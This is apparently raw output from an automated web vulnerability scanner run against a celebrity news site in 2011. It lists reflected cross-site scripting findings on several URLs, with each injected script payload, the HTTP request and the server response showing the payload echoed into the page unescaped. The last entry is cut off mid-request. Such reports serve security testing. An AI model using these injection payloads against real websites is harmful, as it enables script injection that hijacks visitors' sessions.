<a href="http://www.twitter.com/home?status=Jarett+Wieselman+Channel+Page+http://insdr.co/r7Onf2+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/contributor/contributor.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col1"> <div id='channel_title_bar' class='jarett_wieselman'> <a href=''><img src='/media/img/channel_page_name_jarett_wieselman.png' style='margin-left: 190px; margin-top: 0px;' alt='' /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='black_text_link'><img src='/media/photo/2011/12/100422/emily_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='black_text_link horizontal_excerpt'>Emily Blunt's YSL ad: YES!</a></h4><p>I find Emily Blunt's special brand of charm and charisma to be intoxicating, so it's rather fitting she's now fronting YSL's newest fragrance: Opium.</p><a target='_self' href='/fashion/47105_Emily_Blunt_s_Opium_YSL_ad/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='more_from_theinsider_wrapper'><img src='/media/img/contrib_channel_more_news_arrow_jarett_wieselman.jpg' alt='More From The Insider.com' /><ul><li><span class='category_name_small'>gossip</span><a href='/gossip/47165_Idol_Winner_Named_New_Artist_of_the_Year/index.html'>'Idol' Winner Named New Artist of the Year</a></li><li class='more_from_theinsider_separator'><img src='/media/img/3dot_separator.jpg' style='padding-top:10px;' alt='' /></li><li><span class='category_name_small'>gossip</span><a href='/gossip/47164_Robert_Downey_Jr_s_Having_a/index.html'>Robert Downey Jr.'s Having a ... </a></li></ul></div><div class='clearfix'></div><div class='channelblock rightblock'><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='black_text_link'><img src='/media/photo/2011/10/93400/ahs_416_fx.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='black_text_link horizontal_excerpt'>Rubber Man Returns! Watch!</a></h4><p></p><a target='_blank' href='http://www.etonline.com/tv/116490_American_Horror_Story_Clip/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='more_from_theinsider_wrapper'><img src='/media/img/contrib_channel_more_news_arrow_jarett_wieselman.jpg' alt='More From The Insider.com' /><ul><li><span class='category_name_small'>Full Episode</span><a href='/full_episode/43329_Daily_Full_Episode/index.html'>Watch the Latest Full Episode</a></li><li class='more_from_theinsider_separator'><img src='/media/img/3dot_separator.jpg' style='padding-top:10px;' alt='' /></li><li><span class='category_name_small'>gossip</span><a href='/gossip/39514_What_Happened_in_Vegas_This_Weekend_Pics/index.html'>Celebs Hit Las Vegas [Pics]</a></li></ul></div><div class='clearfix'></div><div class='channelblock leftblock'><a target='_blank' href='http://www.etonline.com/news/116484_Trevor_Project_Red_Carpet/index.html' class='black_text_link'><img src='/media/photo/2011/12/100235/zachary_quinto_416_134864664.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_blank' href='http://www.etonline.com/news/116484_Trevor_Project_Red_Carpet/index.html' class='black_text_link horizontal_excerpt'>Zachary Quinto's Coming Out Party</a></h4><p></p><a target='_blank' href='http://www.etonline.com/news/116484_Trevor_Project_Red_Carpet/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='more_from_theinsider_wrapper'><img src='/media/img/contrib_channel_more_news_arrow_jarett_wieselman.jpg' alt='More From The Insider.com' /><ul><li><span cla..
- /lol/

/lol/

http://www.theinsider.com/lol/?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000814)%3C/scri..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000814)</script>

Request

GET /lol/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/lol/46919_Virgin_Diaries_Trailer/index.html
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:56:23 GMT
Content-Length: 11275
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <!-- <base id="htmldom" href="http://www.theinsider.com/" /> --> <!-- This breaks links while in preview server --> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Celebrity Laughs | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider | TheInsider.com</title> <meta name="description" content="" /> <meta name="keywords" content="" /> <meta name="category" content="lol" /> <meta name="date" content="2011-05-18 06:37:00" /><meta property="og:title" content="Celebrity Laughs | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:type" content="article" /><meta property="og:url" content="http://www.theinsider.com/lol/index.html" /><meta property="og:image" content="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><meta property="og:description" content="Celebrity Laughs | Celebrity Gossip | Entertainment News | Pop Culture | TheInsider" /><meta property="og:site_name" content="www.theinsider.com" /><meta property="fb:app_id" content="123263397703043"/><PageMap><DataObject type="date"><Attribute name="displaydate" value="2011-05-18 06:37:00" /><Attribute name="sdate" value="20110518" /></DataObject><DataObject type="thumbnail"><Attribute name="src" value="http://www.theinsider.com/media/img/insider_logo_05172011.jpg" /><Attribute name="width" value="150" /><Attribute name="height" value="150" /></DataObject></PageMap> <link rel="stylesheet" href="/css/main/main.css" type="text/css" /> <link rel="stylesheet" href="/css/nivo-slider/nivo-slider.css" type="text/css" media="screen" /> <link rel="shortcut icon" href="http://www.theinsider.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> <script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script> <script src="http://www.theinsider.com/Scripts/swfobject_modified.js" type="text/javascript"></script> <script src="/js/jquery-1.4.2.min.js" type="text/javascript"></script><script src="/scripts/jquery.nivo.slider.pack.js" type="text/javascript"></script> <script src="Scripts/swfobject_modified.js" type="text/javascript"></script> <script type="text/javascript">$(document).ready(function() { $('#slider').nivoSlider({ effect:'slideInLeft', // Specify sets like: 'fold,fade,sliceDown' animSpeed:200, // Slide transition speed pauseTime:4000, // How long each slide will show startSlide:0, // Set starting Slide (0 index) directionNav:false, // Next & Prev navigation directionNavHide:true, // Only show on hover controlNav:true, // 1,2,3... navigation controlNavThumbs:true, // Use thumbnails for Control Nav controlNavThumbsFromRel:false, // Use image rel for thumbs controlNavThumbsSearch: '.jpg', // Replace this with... controlNavThumbsReplace: '_thumb.jpg', // ...this in thumb Image src keyboardNav:true, // Use left & right arrows pauseOnHover:true, // Stop animation while hovering manualAdvance:false, // Force manual transitions captionOpacity:1, // Universal caption opacity prevText: 'Prev', // Prev directionNav text nextText: 'Next', // Next directionNav text beforeChange: function(){}, // Triggers before a slide transition afterChange: function(){}, // Triggers after a slide transition slideshowEnd: function(){}, // Triggers after all slides have been shown lastSlide: function(){}, // Triggers when last slide is shown afterLoad: function(){} // Triggers when slider has loaded });});</script><style type='text/css'> .nivo-imageLink img{width:416px; height:234px;}</style><!--[if IE]> <style type="text/css"> #navbar li {line-height: 100% !important;} #navbar li span {margin-top:0px !important;} </style><![endif]--><link rel="stylesheet" href="http://detect.get.it/lb1/lightbox.css" /> <script> var getit_boxes = [ { id: 'lb1', width: 480, height: 235, noscroll: false, autopop: 'getit' } ]; </script> </head><body class="body"><!--start Meebo A--><script type="text/javascript">window.Meebo||function(c){function p(){return["<",i,' onload="var d=',g,";d.getElementsByTagName('head')[0].",j,"(d.",h,"('script')).",k,"='//cim.meebo.com/cim?iv=",a.v,"&",q,"=",c[q],c[l]?"&"+l+"="+c[l]:"",c[e]?"&"+e+"="+c[e]:"","'\"></",i,">"].join("")}var f=window,a=f.Meebo=f.Meebo||function(){(a._=a._||[]).push(arguments)},d=document,i="body",m=d[i],r;if(!m){r=arguments.callee;return setTimeout(function(){r(c)},100)}a.$={0:+new Date};a.T=function(u){a.$[u]=new Date-a.$[0]};a.v=5;var j="appendChild",h="createElement",k="src",l="lang",q="network",e="domain",n=d[h]("div"),v=n[j](d[h]("m")),b=d[h]("iframe"),g="document",o,s=function(){a.T("load");a("load")};f.addEventListener?f.addEventListener("load",s,false):f.attachEvent("onload",s);n.style.display="none";m.insertBefore(n,m.firstChild).id="meebo";b.frameBorder="0";b.name=b.id="meebo-iframe";b.allowTransparency="true";v[j](b);try{b.contentWindow[g].open()}catch(w){c[e]=d[e];o="javascript:var d="+g+".open();d.domain='"+d.domain+"';";b[k]=o+"void(0);"}try{var t=b.contentWindow[g];t.write(p());t.close()}catch(x){b[k]=o+'d.write("'+p().replace(/"/g,'\\"')+'");d.close();'}a.T(1)}({network:"theinsider"});</script><!--end Meebo A--><body class="body"> <!-- TOP LEADERBOARD AD --><div id='leaderboard-top-box'><div class="ad_center">
<!-- begin ad tag (tile=1) -->
<div class="dart_ad">
<script language="JavaScript" type="text/javascript">
//<![CDATA[
ord=Math.random()*10000000000000000;
document.write('<script type="text/javascript" src="http://ad.doubleclick.net/adj/theinsider.com/lol;tile=1;sz=960x50,728x90;ord=' + ord + '?"><\/script>');

//]]>
</script>
<noscript>
<a href="http://ad.doubleclick.net/jump/theinsider.com/lol;tile=1;sz=960x50,728x90;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/theinsider.com/lol;tile=1;sz=960x50,960x50;ord=123456789?" border="0" alt="" /></a>
</noscript>
</div>
<!-- end ad tag -->
</div></div><!-- END TOP LEADERBOARD AD --> <div id="container"> <!-- HEADER --> <!-- HEADER -->
<div id="header">
<!-- LOGO -->
<div id="logo"><a href="/index.html" title="The Insider.com"><span>The Insider.com</span></a></div>
<!-- END LOGO -->

<!-- SEARCH & SOCIAL BOX -->
<div id="header_search_social">

<!-- SOCIAL BOX -->
<div id="social_wrapper">

<a href="http://www.twitter.com/home?status=LOL+Channel+Page+http://insdr.co/o6TpNn+via+@theinsider" target="_blank" style="float:left; margin-right: 2px;"><img src="/media/img/header_twitter_icon.jpg" alt="twitter"></a>
<div class="addthis_toolbox addthis_default_style" addthis:url="http://www.theinsider.com" addthis:title="The Insider Homepage">

<a class="addthis_button_stumbleupon"></a>
<a class="addthis_button_facebook_like" fb:like:layout="button_count"></a>
</div>
</div>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4e8e37c800be6a9a"></script>
<!-- AddThis Button END -->
<!-- END SOCIAL BOX -->

<!-- SEARCH BOX -->
<div id="search">
<div id="search_wrapper">
<form action="/search/index.html?sort=date-sdate" id="" method="POST">
<div>
<input type="text" class="searchbox" name="q" value="SEARCH" onclick="javascript:if(this.value == 'SEARCH THE INSIDER.COM'){this.value = '';}" />
<input type="image" src="http://www.theinsider.com/media/img/search_mag.jpg" class="searchbox_submit" value="" name="sa" />
<input type="hidden" name="hq" value="more:recent4" />
</div>
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
</div>
</div>
<!-- END SEARCH BOX -->
</div>
<!-- END SEARCH & SOCIAL BOX -->

<!-- NAVIGATION -->
<div id="navbar">
<ul>
<li class="navtab gossip"> <a href="/gossip/index.html">GOSSIP</a> </li>
<li class="navtab tv"> <a href="/tv/index.html">TV</a> </li>
<li class="navtab movies"> <a href="/movies/index.html">MOVIES</a> </li>
<li class="navtab fashion"> <a href="/fashion/index.html">FASHION</a> </li>
<li class="navtab music"> <a href="/music/index.html">MUSIC</a> </li>
<li class="navtab photos"> <a href="/photos/index.html">PHOTOS</a> </li>
<li class="navtab video"> <a href="/video/index.html">VIDEOS</a> </li>
<!-- Date to include TBD <li class="navtab celebs"> <a href="/celebs">CELEBS</a> </li> -->
</ul>
</div>
<!-- END NAVIGATION -->

<div class="clearfix"></div>

<h1>The Insider.com</h1>
</div>

<!-- TRENDING BOX -->
<link rel="stylesheet" href="/css/main/main.css" type="text/css" /><!-- TRENDING BOX --><div id="trending_wrapper"><ul id="trending_list"><li><a href='/gossip/39237_Before_They_Were_Famous/index.html'><img src='/media/photo/2011/12/100371/megan_fox_416_tcanham_124432726.jpg' alt='' width='138' height='70' /></a><a href='/gossip/39237_Before_They_Were_Famous/index.html' class='trending_links'>Before They Were Famous</a></li><li class='dotted_separator'></li><li><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html'><img src='/media/photo/2011/12/100212/craig_416.jpg' alt='' width='138' height='70' /></a><a href='/movies/46991_Daniel_Craig_swim_scene_for_Skyfall/index.html' class='trending_links'>Daniel Craig (Swim)Suits Up For 'Skyfall'</a></li><li class='dotted_separator'></li><li><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html'><img src='/media/photo/2011/12/100316/leann_rimes_julianne_hough_416.jpg' alt='' width='138' height='70' /></a><a href='/fashion/46993_The_Good_the_Bad_and_the_Ugly/index.html' class='trending_links'>The Good, the Bad and the Ugly</a></li><li class='dotted_separator'></li><li><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html'><img src='/media/photo/2011/12/99690/vid_kobe_bryant_416_112759001.jpg' alt='' width='138' height='70' /></a><a href='/visitcalifornia/46918_Star_Ballers_and_their_Celeb_Fans/index.html' class='trending_links'>Star Ballers and their Celeb Fans</a></li><li class='dotted_separator'></li></ul></div><!-- END HEADER --> <!-- BREAKING NEWS BOX --> <!-- END BREAKING NEWS BOX -->
<!-- END HEADER --> <!-- END HEADER --> <link rel="stylesheet" href="/css/lol/lol.css" type="text/css" /><style>#left_col { float: left; margin: 0 0 0 5px !important; padding: 0; width: 690px;}</style><!--[if IE 7]><style>.lovethis_storylist ul {list-style-type: none; margin-bottom: 10px; margin-top: 0; padding: 0; width: 140px; position: relative; left: -40px;}</style><![endif]--> <div id="main_content"> <div id="left_col"> <div id="channel_title_bar"> <a href="http://www.theinsider.com/lol/"><img src="/media/img/channel_page_name_v3_lol.png" class="channel_title_logo" alt="" /></a> </div><div class="content_container"> <div class='channelblock leftblock'><a target='_self' href='/lol/46979_Kids_Funny_Reaction_to_Spiderman_Kiss/index.html' class='black_text_link'><img src='/media/photo/2011/12/100122/spider_6416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/lol/46979_Kids_Funny_Reaction_to_Spiderman_Kiss/index.html' class='black_text_link horizontal_excerpt'>An Amazing 'Spiderman' Reaction</a></h4><p>Kids Reacting To [fill in the blank] is the latest viral video trend -- and with good reason.</p><a target='_self' href='/lol/46979_Kids_Funny_Reaction_to_Spiderman_Kiss/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/lol/46973_Maya_Rudolph_As_Whitney_Houston_back_on_Saturday_Night_Live/index.html' class='black_text_link'><img src='/media/photo/2011/12/100086/miley_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/lol/46973_Maya_Rudolph_As_Whitney_Houston_back_on_Saturday_Night_Live/index.html' class='black_text_link horizontal_excerpt'>Maya Rudolph Brings Whitney Back to 'SNL'</a></h4><p>Although I am loving Maya Rudolph as Ava on NBC's charming <em>Up All Night</em>, I have been dying to get her back on the <em>Saturday Night Live</em> stage for some time. Thankfully last night's episode not only featured the actress in a surprise cameo (can a hosting gig be next please?), but it involved Maya bringing back one of my all-time favorite impressions: Whitney Houston!</p><a target='_self' href='/lol/46973_Maya_Rudolph_As_Whitney_Houston_back_on_Saturday_Night_Live/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock leftblock'><a target='_self' href='/lol/46947_Tom_Cruise_dances_with_Stacy_Francis/index.html' class='black_text_link'><img src='/media/photo/2011/12/99893/tom_cruise_stacy_francis_416_youtube.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/lol/46947_Tom_Cruise_dances_with_Stacy_Francis/index.html' class='black_text_link horizontal_excerpt'>Tom Cruise & Stacy Francis Duet?!?</a></h4><p>Tom Cruise <a target='_blank' href='http://www.youtube.com/watch?v=G2UVsyVLLcE'>famously danced</a> his way into America's hearts with a tighty whitey-clad performance of <em>Old Time Rock &amp; Roll</em> in <em>Risky Business</em>.</p><a target='_self' href='/lol/46947_Tom_Cruise_dances_with_Stacy_Francis/index.html' class='channel_more_link'>READ</a></div><div class='clearfix'></div></div><div class='channelblock rightblock'><a target='_self' href='/lol/46919_Virgin_Diaries_Trailer/index.html' class='black_text_link'><img src='/media/photo/2011/11/99049/virgin_416.jpg' alt='' /></a><div class='content_text horizontal_excerpt'><h4><a target='_self' href='/lol/46919_Virgin_Diaries_Trailer/index.html' class='black_text_link horizontal_excerpt'>How 'The Virgin Diaries' is like 'Titanic'</a></h4><p>There is a certain anticipatory dread that comes from knowing a character's fate before they do. For example, in <em>Titanic</em>, you kept thinking, &quot;Get off that boat, Rose!&quot; Or, &quot;Romeo, give a girl a hot minute to wake up!&quot;</p><a ta..
- /media/flash/coincident/popOutPlayer.html

/media/flash/coincident/popOutPlayer.html

http://www.theinsider.com/media/flash/coincident/popOutPlayer.html?media='%22--%3E%3C/style%3E%3C/sc..

Parameters

Parameter Type Value
media GET '"--></style></script><script>alert(0x000B19)</script>

Request

GET /media/flash/coincident/popOutPlayer.html?media='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000B19)%3C/script%3E HTTP/1.1
Referer: http://www.theinsider.com/
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: www.theinsider.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Content-Encoding:
Cache-Control: max-age=300
Date: Tue, 06 Dec 2011 06:57:24 GMT
Content-Length: 2681
Connection: keep-alive


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<META HTTP-EQUIV="EXPIRES" CONTENT="01 Jan 1970 00:00:00 GMT">
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<meta name="COPYRIGHT" content="&copy; 2009, 2010, 2011 Coincident TV">
<script src="/media/flash/coincident/scripts/jquery-1.3.2.min.js" type="text/javascript"></script>
<script src="/media/flash/coincident/scripts/CTVLayoutFunc.js" type="text/javascript"></script>
<script src="/media/flash/coincident/scripts/swfobject.js" type="text/javascript" ></script>
<script src="/media/flash/coincident/scripts/CPL.js" type="text/javascript" ></script>
<script src="/media/flash/coincident/scripts/CTVEmbeddedFunc.js" type="text/javascript" ></script>
<script src="/media/flash/coincident/scripts/CTVDeviceDetection.js" type="text/javascript"></script>
<script type="text/javascript">
var CTV_go2NextVidTickId;
var CTV_go2NextVidTickCntr;
var CTV_annoTickPreFix = "endslate_tick_";
var CTV_annoTickNext = "endslate_up_next";

function CTV_countdownTimer(timerSecs) {
CTV_go2NextVidTickId = setInterval("CTV_tickNow()", 1000);
CTV_go2NextVidTickCntr = parseInt(timerSecs.timerSecs) - 1;
}
//-----------------------------------------------------------------------------------------
function CTV_tickNow() {
if(CTV_go2NextVidTickCntr == 0) {
CTV_killTick();
document.getElementById('CTVPlayer').player_invokeAnnotation(CTV_annoTickNext);
return;
}
document.getElementById('CTVPlayer').player_invokeAnnotation(CTV_annoTickPreFix+CTV_go2NextVidTickCntr);
CTV_go2NextVidTickCntr --;
}
//-----------------------------------------------------------------------------------------
function CTV_killTick() {
clearInterval(CTV_go2NextVidTickId);
}
//-----------------------------------------------------------------------------------------
function CTV_disablePopOut() {
document.getElementById('CTVPlayer').player_invokeAnnotation("main_button_pop_out_hide");
showCTVPlayer(true);
}
//-----------------------------------------------------------------------------------------
function showCTVPlayer(showSWF) {
if(showSWF) {
killLoader();
$("#CTVswfCont").animate({opacity:1},500);
$("#CTVswfArea").animate({opacity:1},500);
}
else {
$("#CTVswfCont").css("opacity","0");
$("#CTVswfArea").css("opacity","0");
}
}

function twitterShareCount()
{
alert("Twitter");
}

function facebookShareCount()
{
alert("Facebook");
}

var jReady=false;
var demoPath = "";
var freePlayer = getParam("freePlayer");

function onCTVPlayerComplete() {
if(CTV_isGoogleTV()) {
CTV_googleTVDisclaimer();
return;
}
setWindowMargin(0);
onCTVPlayerLoad();
document.getElementById('CTVLoader').style.visibility = "visible";
$("*").click(function(event){
if(event.target.nodeName == "A" || event.target.nodeName == "a") {
event.preventDefault();
postDebugMsg("clicked to: "+event.target.href);
$("#CTVrenderHTML").attr("src",event.target.href);
}
});

// CTV default
// var CTVPreLoaderFile = "preLoader/CTVPreLoader.swf";
// ET
// var CTVPreLoaderFile = "/media/flash/coincident/preLoader/etPreLoader.swf";
// Insider
var CTVPreLoaderFile = "/media/flash/coincident/preLoader/insiderPreLoader.swf";

var flashVarsPL = {}

var paramsPL = {
movie: CTVPreLoaderFile,
allowFullScreen: "false",
allowscriptaccess: "always",
bgcolor: "#000",
wmode: "transparent"
}
var attributesPL = {
id: "CTVPreLoader",
name: "CTVPreLoader"
};

if(swfobject.hasFlashPlayerVersion("10.x.x")) {
swfobject.embedSWF(CTVPreLoaderFile, "CTVLoader", "100%", "100%", "10.x.x", "/media/flash/coincident/scripts/expressInstall.swf", flashVarsPL, paramsPL, attributesPL);
}

// preLoader end

var CTVFile = "";
// remove comment if using PHP and POST to send the CTV file
CTVFile = "'"--></style></script><script>netsparker(0x000B19)</script>";
if (!CTVFile)
{
if (getParam("media") != null)
CTVFile = getParam("media");
else if (getParam("fCTV") != null)
CTVFile = demoPath+getParam("fCTV")+"/"+getParam("fCTV")+".ctv";
}
if (!CTVFile)
{
// initialized to default CTV file here
CTVFile="ctvcontent/video_00/home.ctv";
// PLEASE DO NOT CHECK IN CODE WITH CTVFile DEFINED HERE!
}

var flashVars = {
media: CTVFile,
twitterShareCount : 0,
facebookShareCount : 0,
showBranding: true,
freePlayer: freePlayer,
enableAboutBox: true,
showBtnBarPIP: true
};

var params = {
movie: "/media/flash/coincident/CTVWebPlayerS.swf",
allowFullScreen: "true",
allowscriptaccess: "always",
bgcolor: "#000",
wmode: "opaque"
};

var attributes = {
id: "CTVPlayer",
name: "CTVPlayer"
};

swfobject.embedSWF("/media/flash/coincident/CTVWebPlayerS.swf", "CTVPlayer", "100%", "100%", "10.x.x", "/media/flash/coincident/scripts/expressInstall.swf", flashVars, params, attributes);
jReady = true;

if (needToHandleFF())
{
document.getElementById("CTVswfCont").style.position = "fixed";
}

function needToHandleFF()
{
var result = false;
var a = navigator.userAgent;

if( ( a.indexOf("Firefox/3.0") != -1
|| a.indexOf("Firefox/3.1") != -1
|| a.indexOf("Firefox/3.5") != -1 )

&& a.indexOf("Windows") != -1
)
{
result = true;
}

return result;
}

function isReady() {
return jReady;
}
}

addEvent(window, "load", onCTVPlayerComplete);
addEvent(window, "resize", resizeStart);

</script>
<title>Coincident.TV | Insider</title>
<link href="/media/flash/coincident/styles.css" type="text/css" media="all" rel="stylesheet" />
<style>
h1 {
color:#DDD;
font-family:"Trebuchet MS", Arial, Helvetica, sans-serif;
font-size:16px;
padding:20px 10px;
}
#CTVPlayer {
color: #EEE;
font-family: Helvetica, Tahoma, Arial, Sans-serif;
font-size: 14px;
font-weight: 500;
text-align: center;
}
body {
background-color: #FFF;
}
</style>
</head>

<body>
<div id="CTVbckgndArea" class="CTVemptyBckgndDiv"></div>
<div id="CTVHTMLDiv" class="CTVHTMLDiv"></div>
<div id="CTVswfCont" class="CTVswfArea" style="top:0px; left:0px;">
<div id="CTVPlayer">
</div>
</div>
<div id="CTVLoaderCont" class="CTVLoaderArea">
<div id="CTVLoader">
<p>Please install the latest Flash Player to enjoy our content</p>
<a href="http://www.adobe.com/go/getflashplayer">
<img src="http://www.adobe.com/images/shared/download_buttons/get_adobe_flash_player.png" alt="Get Adobe Flash player" border="0" />
</a>
</div>
</div>
<!--addCustAnalitycs-->
<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-13230380-1");
pageTracker._trackPageview();
} catch(err) {}
</script>
</body>
</html>
- /inc/huffpost/display/43462_Huffpost_Display/

/inc/huffpost/display/43462_Huffpost_Display/

http://www.theinsider.com/inc/huffpost/display/43462_Huffpost_Display/?'%22--%3E%3C/style%3E%3C/scri..

Parameters

Parameter Type Value
Query Based QUERYSTRING '"--></style></script><script>alert(0x000911)</script>

Request

GET /inc/huffpost/display/43462_Huffpost_Display/?'"--> HTTP/1.1
Referer: http://www.theinsider.com/inc/huffpost/display/43462_Huffpost_Display/index.html?entryid=1129874
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
